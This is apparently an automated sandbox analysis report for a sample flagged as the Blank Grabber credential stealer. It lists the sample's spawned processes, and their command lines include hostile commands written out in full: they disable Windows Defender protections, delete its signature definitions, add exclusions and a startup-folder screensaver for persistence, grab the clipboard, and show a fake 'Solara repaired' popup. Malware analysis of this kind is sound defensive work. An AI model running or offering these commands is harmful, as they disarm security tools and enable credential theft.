                                                                                                                                                                                                                                    2024-11-23 18:44:40 UTC1251INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 18:44:40 GMT
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Content-Length: 45
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                    x-ratelimit-limit: 5
                                                                                                                                                                                                                                    x-ratelimit-remaining: 4
                                                                                                                                                                                                                                    x-ratelimit-reset: 1732387481
                                                                                                                                                                                                                                    x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                    via: 1.1 google
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dnofcTgJO77a0qvnY06ZSBgJThFUi8RPU8CzONyuww46HrhNSYoQIulPhbjpsHEv8wynrDDGIVboMnd6LkVRJj0bS6cflMBGGEW9Mg25a0WM87vZtObL%2FuVdqpj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                    Set-Cookie: __cfruid=bfbee4d8f0c66307eb752299893c7bde277a9e1d-1732387480; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                    Set-Cookie: _cfuvid=r8z8dclj1LJ.4o5SqnVjdAiCBtWH7bkTOCEb1MOHljw-1732387480233-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8e734fba9c4d8c7e-EWR


                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:13:44:00
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\cmd.exe"
                                                                                                                                                                                                                                    Imagebase:0x7ff70aef0000
                                                                                                                                                                                                                                    File size:6'263'156 bytes
                                                                                                                                                                                                                                    MD5 hash:B2FE874C2E11C56EDF05C5250A8C966F
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1701296843.00000162C4354000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1701296843.00000162C4352000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                    Start time:13:44:01
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\cmd.exe"
                                                                                                                                                                                                                                    Imagebase:0x7ff70aef0000
                                                                                                                                                                                                                                    File size:6'263'156 bytes
                                                                                                                                                                                                                                    MD5 hash:B2FE874C2E11C56EDF05C5250A8C966F
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2096102942.000001C916489000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2098275549.000001C916C2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2090937481.000001C917404000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()""
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'"
                                                                                                                                                                                                                                    Imagebase:0x310000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"
                                                                                                                                                                                                                                    Imagebase:0x7ff727d80000
                                                                                                                                                                                                                                    File size:14'848 bytes
                                                                                                                                                                                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                    Start time:13:44:06
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                    Start time:13:44:06
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                    Start time:13:44:06
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                    Start time:13:44:06
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                    Start time:13:44:06
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                    Imagebase:0x7ff73cba0000
                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                    Start time:13:44:07
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                    Imagebase:0x7ff73cba0000
                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                    Start time:13:44:07
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                    Start time:13:44:07
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                    Start time:13:44:07
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                    Start time:13:44:07
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                    Start time:13:44:07
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                    Start time:13:44:07
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                    Start time:13:44:07
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                    Start time:13:44:07
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                    Start time:13:44:07
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    General

